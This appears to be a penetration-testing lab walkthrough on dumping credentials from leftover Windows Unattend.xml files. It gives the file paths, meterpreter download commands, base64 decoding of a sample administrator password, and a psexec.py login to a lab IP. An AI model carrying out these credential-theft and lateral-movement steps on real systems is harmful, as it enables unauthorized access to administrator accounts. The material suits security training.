Credentials Dumping
Passwords Configuration Files
Windows configuration files can contain stored passwords, e.g. in the Unattended Windows Setup utility, used to mass deploy Windows on systems.
The configuration file can contain specific configurations and user account credentials
An attacker can find the configuration file left on the target after installation
The utility typically utilizes those files:
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Autounattend.xml
The stored passwords might be encoded in
base64(easily decodable).
#Exploitation
After getting a meterpreter session or shell session follow the follwing technique:-
Manually search for the
unattend.xmlfile, it should be insideC:\\Windows\\Panther
cd C:\\Windows\\Panther
dir
download unattend.xml
In a new terminal tab
cat unattend.xml
Get Access
administratoruser configured base64 password isQWRtaW5AMTIzSave it to a new file
Decode it using the
base64tool
nano password.txt
# paste the password, save and exit the file
base64 -d password.txt
Admin@123root
Test the
administrator:Admin@123rootcredentials with thepsexectool
psexec.py administrator@10.4.19.9You have gained access to the administrator account
Last updated